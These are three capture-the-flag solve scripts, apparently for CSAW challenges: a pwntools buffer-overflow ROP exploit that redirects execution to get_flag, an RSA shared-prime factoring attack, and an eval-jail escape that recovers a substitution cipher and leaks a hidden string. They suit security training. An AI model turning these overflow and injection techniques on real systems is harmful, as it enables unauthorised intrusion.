1
#!/usr/bin/env python3
2

3
from pwn import (
4
    ROP,
5
    args,
6
    context,
7
    flat,
8
    p64,
9
    process,
10
    raw_input,
11
    remote,
12
)
13

14
FILE = "./overflow_me"
15
HOST, PORT = "chals.ctf.csaw.io", 21006
16

17
context(log_level="debug", binary=FILE, terminal="kitty")
18

19
elf = context.binary
20
rop = ROP(elf)
21

22

23
def launch():
24
    global target
25
    if args.L:
26
        target = process(FILE)
27
    else:
28
        target = remote(HOST, PORT)
29

30

31
def main():
32
    launch()
33

34
    secret_addr = elf.bss() + 0x28
35
    target.success(f"secret addr: {hex(secret_addr)}")
36

37
    target.sendafter(b"Tell me its address", p64(secret_addr))
38
    leak = target.recvlines(2)[1]
39
    secret = int(leak, 16).to_bytes(0x8, "little")
40
    target.success(f"leaked_addr: 0x{secret.hex()}")
41
    target.sendafter(b"the story unlocks", secret)
42

43
    target.recvuntil(b"for you: ")
44
    val = int(target.recvline().strip(), 16).to_bytes(0x8, "little")
45
    target.success(f"val: 0x{val.hex()}")
46

47
    # raw_input("DEBUG")
48
    payload = flat(
49
        b"A" * 64,
50
        val,
51
        b"A" * 0x10,
52
        rop.ret.address,
53
        elf.sym["get_flag"],
54
    )
55
    target.sendlineafter(b"into this story.", payload)
56

57
    target.interactive()
58

59

60
if __name__ == "__main__":
61
    main()

1
#!/usr/bin/env python3
2

3
import math
4

5
from Crypto.Util.number import inverse, long_to_bytes
6

7
e = 65537
8
n1 = 129092526753383933030272290277107300767707654330551632967994396398045326531320303963182497488182474202461120692162734880438261410066549845639992024037416720228421076282632904598519793243067220342037144864237020757818263128301138206081187472003821789897063195512919097350247829148288118913456964033001399074373
9
n2 = 108355113470836594630192960651980673780103497896732213011958303033575870030505528169174729530490405910634291415346360688290452976527316909469646908289732023715737439312572012648165819533234604850608390233938174081867146846639110685928136323983961395098632140681799175543046722931901766226759894951292033805879
10
d1 = 88843495989869871001559754882918076779858404440780391818567639602073173623287821751315349650577023725245222074965050035045516207303078461168168819365025746973589245131570143944718203046457391270418459087764266630890566079039821735168805805866019315142070438225092171304343352469029480503113942986147848666077
11
d2 = 94565144275929764017241865812435668644218918537941567711225644474418458115544003036362558987818610553975855551983688286593672386482543188020042082319191545660551324293738920214028045344249670512999137548994496577128446165632885775744795722253354007167294035878656056258332703809173397147948143695113558988035
12

13

14
def solve():
15
    print("--- Starting Common Factor Attack ---")
16
    p = math.gcd(n1, n2)
17

18
    if p > 1:
19
        print("[+] Success! A common factor was found.")
20
        print("Shared Prime (p): {p}\n")
21

22
        q1 = n1 // p
23
        q2 = n2 // p
24

25
        print("--- Factoring Results ---")
26
        print("q1: {q1}")
27
        print("q2: {q2}")
28
        print("[+] Verification successful: p * q1 == n1 and p * q2 == n2\n")
29

30
        # Calculate Euler's totient function
31
        phi1 = (p - 1) * (q1 - 1)
32
        phi2 = (p - 1) * (q2 - 1)
33

34
        # Calculate the correct private keys
35
        d_correct_1 = inverse(e, phi1)
36
        d_correct_2 = inverse(e, phi2)
37
        print("--- Calculated Correct Private Keys ---")
38
        print(f"d_correct_1: {d_correct_1}")
39
        print(f"d_correct_2: {d_correct_2}\n")
40

41
        print("--- Decrypting given 'd' values as ciphertext ---")
42

43
        try:
44
            plaintext_1 = pow(d1, d_correct_1, n1)
45
            flag_1 = long_to_bytes(plaintext_1)
46
            print(f"[+] Decrypted plaintext from d1: {flag_1}")
47
        except Exception as ex:
48
            print(f"[-] Decryption failed for d1: {ex}")
49

50
        try:
51
            plaintext_2 = pow(d2, d_correct_2, n2)
52
            flag_2 = long_to_bytes(plaintext_2)
53
            print(f"[+] Decrypted plaintext from d2: {flag_2}")
54
        except Exception as ex:
55
            print(f"[-] Decryption failed for d2: {ex}")
56

57
    else:
58
        print("[-] Attack failed. n1 and n2 do not share a common factor.")
59

60

61
solve()

1
#!/usr/bin/env python3
2

3
from pwn import context, process, remote, args
4
import sys
5

6
FILE = "./main.py"
7
HOST, PORT = "chals.ctf.csaw.io", 21009
8

9
context(log_level="debug")
10

11
alphabet = "abcdefghijklmnopqrstuvwxyz'"
12

13

14
def launch():
15
    global target
16
    if args.L:
17
        target = process(["python3", FILE])
18
    else:
19
        target = remote(HOST, PORT)
20

21

22
def main():
23
    launch()
24

25
    def send_recv_str(payload):
26
        target.recvuntil(b"> ", timeout=1)
27
        target.sendline(payload.encode())
28
        try:
29
            line = target.recvline()
30
            if not line:
31
                return ""
32
            return line.decode(errors="ignore").strip()
33
        except Exception:
34
            return ""
35

36
    target.recvuntil(b"> ")
37

38
    apost_cipher = None
39
    for c in alphabet:
40
        # if ciphertext c -> "'", then c + "[" + c becomes "'['" after unwarp, eval("'['") -> prints [
41
        resp = send_recv_str(c + "[" + c)
42
        if resp and "[" in resp and resp != "no galaxy":
43
            apost_cipher = c
44
            target.info(
45
                f"Found apostrophe ciphertext: {apost_cipher!r} (response={resp!r})"
46
            )
47
            break
48

49
    if not apost_cipher:
50
        target.failure("Could not find apostrophe ciphertext. Abort.")
51
        target.close()
52
        sys.exit(1)
53

54
    # build cipher -> plaintext mapping by probing apost_cipher + candidate + apost_cipher
55
    cipher_to_plain = {}
56
    for c in alphabet:
57
        resp = send_recv_str(apost_cipher + c + apost_cipher)
58
        # on success resp is printed plaintext character (single char)
59
        if resp and resp != "no galaxy":
60
            cipher_to_plain[c] = resp[0]
61
            target.debug(f"cipher {c!r} -> plain {cipher_to_plain[c]!r}")
62
        else:
63
            cipher_to_plain[c] = None
64

65
    # the candidate that maps to "'" will have produced no valid eval (None).
66
    # fill it explicitly using apost_cipher we discovered.
67
    cipher_to_plain[apost_cipher] = "'"
68
    target.info(f'Explicitly set cipher {apost_cipher!r} -> plain "\'"')
69

70
    # invert mapping to get plaintext -> ciphertext
71
    plain_to_cipher = {}
72
    for c, pch in cipher_to_plain.items():
73
        if pch is not None:
74
            # if multiple c map to same pch (shouldn't), last one wins — but mapping is bijection here
75
            plain_to_cipher[pch] = c
76

77
    # sanity check
78
    missing = [ch for ch in alphabet if ch not in plain_to_cipher]
79
    if missing:
80
        target.warning(f"Missing plaintext->cipher mappings for: {missing}")
81
    else:
82
        target.info("Recovered full plaintext->cipher mapping for a-z and apostrophe.")
83

84
    # helper to encrypt plaintext expression using mapping
85
    def encrypt_plaintext(expr):
86
        out = []
87
        for ch in expr:
88
            if ch in plain_to_cipher:
89
                out.append(plain_to_cipher[ch])
90
            else:
91
                out.append(ch)
92
        return "".join(out)
93

94
    # negative index expression using allowed chars only
95
    def neg_expr(n):
96
        """
97
        Build an expression that evaluates to -n using only allowed characters.
98
        Use ~('a'<'b') == -2 and ~('a'<'a') == -1, combine with +.
99
        """
100
        q = n // 2
101
        r = n % 2
102
        parts = ["~('a'<'b')" for _ in range(q)]
103
        if r:
104
            parts.append("~('a'<'a')")
105
        return "+".join(parts)
106

107
    # ensure we can encrypt 'spiral' (all letters present)
108
    for ch in "spiral":
109
        if ch not in plain_to_cipher:
110
            target.failure(f"Missing mapping for letter {ch!r}. Aborting.")
111
            target.close()
112
            sys.exit(1)
113
    enc_spiral = encrypt_plaintext("spiral")
114
    target.info(f"Encrypted 'spiral' -> {enc_spiral!r}")
115

116
    # dump characters one-by-one using negative indices
117
    flag_chars = []
118
    MAX_CHARS = 80
119
    for i in range(1, MAX_CHARS + 1):
120
        idx_plain = neg_expr(i)
121
        expr_plain = f"spiral[{idx_plain}]"
122
        expr_cipher = encrypt_plaintext(expr_plain)
123
        resp = send_recv_str(expr_cipher)
124
        if not resp or resp == "no galaxy":
125
            target.info(f"Index -{i} out-of-range or eval error (resp={resp!r}), stop.")
126
            break
127
        ch = resp[0]
128
        target.info(f"got index -{i}: {repr(ch)}")
129
        flag_chars.append(ch)
130

131
    flag = "".join(reversed(flag_chars))
132
    target.success(f"Recovered flag (partial/full): {flag}")
133

134
    target.close()
135

136

137
if __name__ == "__main__":
138
    main()